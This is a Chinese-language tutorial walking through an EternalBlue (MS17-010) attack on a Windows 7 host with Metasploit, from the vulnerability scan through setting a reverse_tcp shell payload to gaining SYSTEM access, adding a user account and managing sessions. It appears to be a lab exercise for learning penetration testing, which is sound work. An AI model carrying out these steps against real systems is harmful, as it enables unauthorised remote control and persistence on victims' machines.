实战-使用msf渗透攻击win7主机并远程执行命令

简介: 实战-使用msf渗透攻击win7主机并远程执行命令

 1.什么是永恒之蓝?

 

永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。

2.通过msf模块获取win7主机远程shell

模块的整体使用流程如下

image.gif编辑

1.我们先扫描目标是否存在ms17-010漏洞

image.gif编辑

2.加载对应的模块

image.gif编辑

3.查看需要设置的参数

show options

image.gif编辑

4.设置目标主机

image.gif编辑

5.开始扫描,run运行

如图,我们可以确定目标是脆弱的,系统里有ms17-010漏洞。image.gif编辑

6.查找攻击模块

image.gif编辑

7.加载攻击模块

image.gif编辑

8.查看需要设置的参数

image.gif编辑

9.设置目标主机

image.gif编辑

10.查看该攻击载荷使用的系统类型show targets

如图,可以看出永恒之蓝可以针对win7和server 2008操作系统。

image.gif编辑

11.查看该模块可以使用的攻击载荷 show payloads

image.gif编辑

12.选择攻击模块 show windows/x64/shellimage.gif编辑

13.设置攻击载荷 set payload windows/x64/shell/reverse_tcp

image.gif编辑

14.设置本地主机 set LHOST 192.168.0.109

15.查看设置参数

image.gif编辑

16.run运行

如图,渗透成功。

image.gif编辑

17.执行一些命令去测试一下

添加一个账号

image.gif编辑

在win7系统里查看用户。如图,添加成功。

image.gif编辑

但是,我们在终端模拟器里看到一些乱码。

image.gif编辑

原因是:一个是linux系统,一个是windows系统,编码方式不一样。

解决办法:chcp 65001

image.gif编辑

image.gif编辑

查看我们的权限。

如图,可以看到我们是系统最高权限及root权限。

image.gif编辑

终端会话:ctrl+c

image.gif编辑

 拿到会话后,我们将其保存到后台 exploit -j

image.gif编辑

此时,会话保存到后台了。我们输入sessions,进行查看。

image.gif编辑

记录会话 sessions -i 4

image.gif编辑

退出但不断开这个链接 background

image.gif编辑

删除会话 sessions -k 4

image.gif编辑

3.总结使用metasploit攻击的步骤

1.查找CVE公布的漏洞

2.查找对应的exploit模块

3.配置模块参数

4.添加payload后门

5.执行exploit开始攻击


相关文章
|
11月前
|
Web App开发 XML 安全
ZeroShell防火墙存在远程命令执行漏洞(CVE-2019-12725)
zeroshell防火墙存在远程命令执行漏洞,攻击者可通过特定URL链接对目标进行攻击!!!
261 1
|
11月前
|
安全 Linux 网络安全
使用D盾扫描Linux主机Webshell
使用D盾扫描Linux主机Webshell
324 0
使用D盾扫描Linux主机Webshell
|
网络协议
Metasploit -- 指定端口扫描主机
Metasploit -- 指定端口扫描主机
94 0
Metasploit -- 指定端口扫描主机
|
安全 Ubuntu 关系型数据库
Metasploit -- 攻击Metasploitable2靶机
Metasploit -- 攻击Metasploitable2靶机
446 0
Metasploit -- 攻击Metasploitable2靶机
|
网络安全 数据库 数据安全/隐私保护
2022-渗透测试-信息收集-Metasploit(基于SSH协议)
2022-渗透测试-信息收集-Metasploit(基于SSH协议)
2022-渗透测试-信息收集-Metasploit(基于SSH协议)
|
安全
利用Armitage进行渗透(MSF图形化界面)
利用Armitage进行渗透(MSF图形化界面)
596 0
利用Armitage进行渗透(MSF图形化界面)
|
安全 Shell 数据安全/隐私保护
python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)
vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终我们提到的权限也是root;当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,因此也称为笑脸漏洞。
384 0
python——脚本实现检测目标ip是否存在ftp笑脸漏洞(ftp后门漏洞)
|
Oracle 安全 关系型数据库
远程winodws 出现身份验证错误
连接的时候出现身份验证错误
298 0
远程winodws 出现身份验证错误
|
安全 Windows
高危Windows系统 SMB/RDP远程命令执行漏洞 手工修复办法
 1、Windows Update更新补丁方式: 更新方法:点击“开始”->“控制面板”->“Windows Update” ,点击“检查更新”-“安装更新”:   2、检查安装结果: 点击“查看更新历史记录”,检查安装的补丁: 3、重启系统生效 漏洞参考: https://blogs.
1428 0